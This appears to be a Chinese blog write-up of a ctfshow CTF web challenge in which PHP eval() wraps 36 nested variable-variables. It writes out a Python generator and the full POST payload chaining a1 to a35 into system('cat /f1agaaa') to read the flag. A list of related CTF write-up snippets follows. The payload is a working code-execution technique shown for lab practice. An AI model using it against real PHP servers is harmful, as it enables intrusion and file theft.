菜狗杯Web_我眼里只有$wp
原题:
虽然不太会php,但看了题目很容易联想到是想要把这么多的$符号都给抵消掉,可以先用Python看一下有多少个$,得知一共是36个$,那我们搞出36个变量就好啦,而且外面套的函数是eval(),那就让最后一个变量用于执行命令。
具体思路就是把上一个变量赋值给下一个变量,直到第36个变量,给它赋值为想要执行的命令,并且从原题的php中可以看到,需要用post方法传参。
因为变量太多,所以还是借助Python生成一下,题目给出的$_可以看做a0,我们生成从a1到a35,最后添上a35的值。
浅写这么三行Python:
s='_'
for i in range(1,36):s+='='+'a'+str(i)+'&'+'a'+str(i)
运行效果如下:
把上面得到的字符串放到POST请求报文的报文体中,并在最后添加变量a35的值(即想要执行的命令)。
先浅试一下ls命令查看下根目录,看到有f1agaaa:
把命令换成cat /f1agaaa即可回显出flag:
payload如下:
_=a1&a1=a2&a2=a3&a3=a4&a4=a5&a5=a6&a6=a7&a7=a8&a8=a9&a9=a10&a10=a11&a11=a12&a12=a13&a13=a14&a14=a15&a15=a16&a16=a17&a17=a18&a18=a19&a19=a20&a20=a21&a21=a22&a22=a23&a23=a24&a24=a25&a25=a26&a26=a27&a27=a28&a28=a29&a29=a30&a30=a31&a31=a32&a32=a33&a33=a34&a34=a35&a35=system(‘cat /f1agaaa’);
注意最后有分号!
ps:因为写博客时候环境过期了所以重新开了一个,导致两张burp的截图里域名不一样
菜狗杯Web_我眼里只有$wp相关推荐
- ctf菜狗杯OSINT wp
菜狗杯OSINTwp Fish And Turtles 由B-6448和8月27日可以查到由早上赶飞机可以得知flag ctfshow{成都-厦门-3U6953} 碧海蓝天 把他放到搜狗识图![可以得 ...
- ctfshow【菜狗杯】misc
文章目录 web web签到 web2 c0me_t0_s1gn 我的眼里只有$ 抽老婆 一言既出 驷马难追 TapTapTap Webshell 化零为整 无一幸免 无一幸免_FIXED 传说之下( ...
- 菜狗杯Misc一层一层一层地剥开我的♥wp
目录 一.原题 二.解题步骤 对jpg图片的处理 对文件名是一个心形的数据文件的处理 base100解码 这题完全是看着官方wp复现的,感觉涉及的步骤比较多但每一步本身不难,多记录一遍加深印象. 一. ...
- 菜狗杯Misc抽象画wp
目录 一.拿到题目先干嘛 二.具体的解密操作 1.把文本放到CyberChef中用Magic解密 2.把完整的解密内容复制出来 3.打开010并以hex格式粘贴内容 4.点一下HEX 5.保存成png ...
- ctfshow 菜狗杯 taptap wp
启动环境 小游戏 看源码 查找关键字score 解码得 访问该路径,拿到flag
- ctfshow菜狗杯 web 我的眼里只有$
萌新入坑,防懒细胞滋生 题目有36个$,给出的最后一个$_可以看做变量0 生成从变量1到变量35,最后赋给变量35的值为真正想执行的命令. my_str = '_' for i in range(26 ...
- ctfshow菜狗杯webwp
web签到 <?php error_reporting(0); highlight_file(__FILE__);eval($_REQUEST[$_GET[$_POST[$_COOKIE['CT ...
- CTFSHOW 菜狗杯--WEB
WEB签到 eval($_REQUEST[$_GET[$_POST[$_COOKIE['CTFshow-QQ群:']]]][6][0][7][5][8][0][9][4][4]); 简单的解释下这个嵌 ...
- CTFshow菜狗杯-misc-wp(详解 脚本 过程 全)
首先感谢ctf平台和各位出题的大佬 其次感谢各位读者,对我的支持( •̀ ω •́ )y 有什么问题和建议可以私聊我 废话不多话开启你们的旅程吧 这个也是我这几天才看 一些见解和思路分享给你们 希望你 ...
- CTFSHOW菜狗杯 web
文章目录 web签到 web2 c0me_t0_s1gn 我的眼里只有$ 抽老婆 一言既出 驷马难追 TapTapTap Webshell 化零为整 无一幸免 传说之下(雾) 算力超群 算力升级 2 ...
最新文章
- 素材诊断分析助手_短视频运营必备的8款数据分析工具
- 伯克利AI研究院:强化学习是GPT2等自回归语言模型弥补不足的良方?
- java中注解的使用与实例 (二)
- GRE核心词汇助记与精练-List11弯、折、扭
- 第十一届蓝桥杯赛后总结 —— 两年征战蓝桥,惜败来年再战。
- java+random+oracle,oracle随机数 — dbms_random
- html数据复制到剪切板
- kingcms php 排序 标签,Phpcms v9 如何设置排序listorder
- 最有价值的编程忠告[转CSDN]
- 《完整部署 OCS-NG》
- 轻松玩转windows7之一:利用无线玩转虚拟网络
- JavaScript 【js】回车键替换成逗号,逗号替换成回车键
- 2020美团实习试题
- c语言stdin输入字符,scanf如何从stdin中读取数据的
- 学习juca:Striped64(1.8)
- [摘记]数值方法02——内插法和外推法
- WQ7033开发指南(基础篇)之1.1 初识SDK
- Arduino 各种模块篇 震动模块 常开 震动传感器模块
- java中的“属性”:property、attribute、parameter
- 什么是Beta Finance
热门文章
- AtCoder题解 —— AtCoder Regular Contest 108 —— A - Sum and Product
- 激光电视的优缺点说明,激光电视与投影有什么区别
- 打开Access时电脑出现蓝屏,错误编号0x00000116的问题解决
- java inflate deflate_Java中的可迭代gzip deflate / inflate
- 【python+selenium】自动登陆学校青果教务网
- 网盘翻车不断,我是如何低价自建一个自用网盘
- 三大语言(C/Java/Python)基本数据类型大小 / 内置容器 总结
- OpenGrok简单使用
- 每日一书丨这本书献给所有铸就开源世界的人们
- uniapp uni-swipe-action 滑动删除